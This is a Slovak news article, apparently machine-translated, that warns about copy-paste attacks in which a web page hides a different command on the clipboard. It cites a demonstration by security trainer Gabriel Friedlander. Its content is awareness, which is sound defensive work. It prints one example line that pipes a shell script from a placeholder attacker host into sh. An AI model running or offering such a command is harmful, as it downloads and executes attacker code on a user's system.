- Všetci denne kopírujeme a vkladáme z internetu bez toho, aby sme poznali riziká.
- Bezpečnostný expert si pri tom našiel čas, aby všetkým ukázal najhorší možný scenár.
- Vloženie príkazov, ktoré ste dostali z internetu, do vášho terminálu je rýchly spôsob, ako sa dostať hackeri
- Príkazy, o ktorých ste si mysleli, že ich vkladáte do svojho terminálu, sú v skutočnosti škodlivé kódy.
Je pravda, že žijeme v dobe, kde je rýchlosť všetkým a záleží len na rýchlych výsledkoch. Len málo ľudí sa však na chvíľu zastaví a zamyslí sa nad následkami.
Milióny programátorov, správcov a bezpečnostných výskumníkov denne vykonávajú jednoduché úlohy, ako je kopírovanie a vkladanie príkazov z webových stránok priamo do konzol na svojich počítačoch.
Hoci mnohí o tom ani nepremýšľajú, dôsledky sú väčšie a nebezpečnejšie, ako by ste si na začiatku mysleli, najmä ak ukladáte citlivé alebo cenné údaje.
Známy bezpečnostný expert si našiel čas a podelil sa čo sa vlastne môže stať ak skopírujete a prilepíte obsah z webových stránok.
Kopírovať + prilepiť je jednoduchý spôsob, ako sa skutočne nechať hacknúť
Gabriel Friedlander, ktorý je zakladateľom školiacej platformy na zvyšovanie povedomia o bezpečnosti Wizer, stiahol obálku schémy, ktorá vás prinúti dvakrát si premyslieť, než skopírovať a prilepiť príkazy z webových stránok.
Kopírovanie a vkladanie obsahu z internetu je v dnešnej dobe také bežné, že sa nad tým nikto ani nezamýšľa.
Friedlander však varuje, že niektoré webové stránky sú klamlivejšie, než by si človek mohol na prvý pohľad uvedomiť, a to, čo si myslíte, že ste z nich skopírovali, sa veľmi líši od toho, čo ste v skutočnosti urobili.
A najhoršie na tom všetkom je, že bez potrebných znalostí alebo usmernení si obete uvedomia svoju chybu až po prilepení textu, v tom momente už môže byť neskoro.
Bezpečnostný analytik tiež vymyslel malý test pre čitateľov svojho blogu, aby ľudia skutočne pochopili, aké ľahké je pre vás neochotne otvárať dvere kyberzločincom.
Poskytol príkaz, ktorý je určený na skopírovanie, ale príslušná pravda sa odhalí až vtedy, keď vložíte text a uvidíte, čo ste vlastne zaviedli vo svojom nastavení.
Po skopírovaní príkazu zobrazeného na obrázku vyššie vás výsledok prilepenia šokuje, pretože je ďaleko od toho, čo ste si mysleli, že duplikujete.
zvlniť http://attacker-domain: 8000/shell.sh | shOkrem úplne iného príkazu, ktorý sa nachádza vo vašej schránke, je znak nového riadku (alebo návratu) at jeho koniec znamená, že vyššie uvedený príklad sa spustí hneď po vložení priamo do systému Linux terminál.
Preto by ste si mali byť viac vedomí toho, čo sa skutočne deje, a berte to ako vážne bezpečnostné riziko. Nehovoríme, že všetky webové stránky skrývajú škodlivý obsah, ale oplatí sa to vziať do úvahy.
Stalo sa vám niekedy, že ste boli napadnutí hackermi pri vkladaní riskantných príkazov do vášho terminálu? Podeľte sa s nami o svoje skúsenosti v sekcii komentárov nižšie.
